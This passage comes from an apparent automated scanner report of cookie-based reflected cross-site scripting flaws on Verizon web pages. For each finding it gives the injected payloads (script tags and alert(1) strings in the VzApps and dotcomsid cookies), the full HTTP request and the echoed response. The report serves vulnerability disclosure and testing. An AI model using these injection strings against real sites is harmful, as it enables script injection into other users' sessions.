vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125645
Expires: Sat, 20 Nov 2010 02:57:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "a8315"-alert(1)-"72b07553601"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: docu
...[SNIP]...

1.169. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload ee9d4<script>alert(1)</script>d473025d44e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXee9d4<script>alert(1)</script>d473025d44e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150432
Expires: Sat, 20 Nov 2010 03:00:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEE9D4<SCRIPT>ALERT(1)</SCRIPT>D473025D44E </DIV>
...[SNIP]...

1.170. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c19d5'><script>alert(1)</script>36277642c37 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc19d5'><script>alert(1)</script>36277642c37; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150436
Expires: Sat, 20 Nov 2010 03:00:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC19D5'><SCRIPT>ALERT(1)</SCRIPT>36277642C37 ' />
...[SNIP]...

1.171. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ff7"-alert(1)-"213bd3ed367 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=29ff7"-alert(1)-"213bd3ed367; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 161440
Expires: Sat, 20 Nov 2010 03:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "29ff7"-alert(1)-"213bd3ed367"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.172. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86006<script>alert(1)</script>84bd500f181 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86006<script>alert(1)</script>84bd500f181; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; 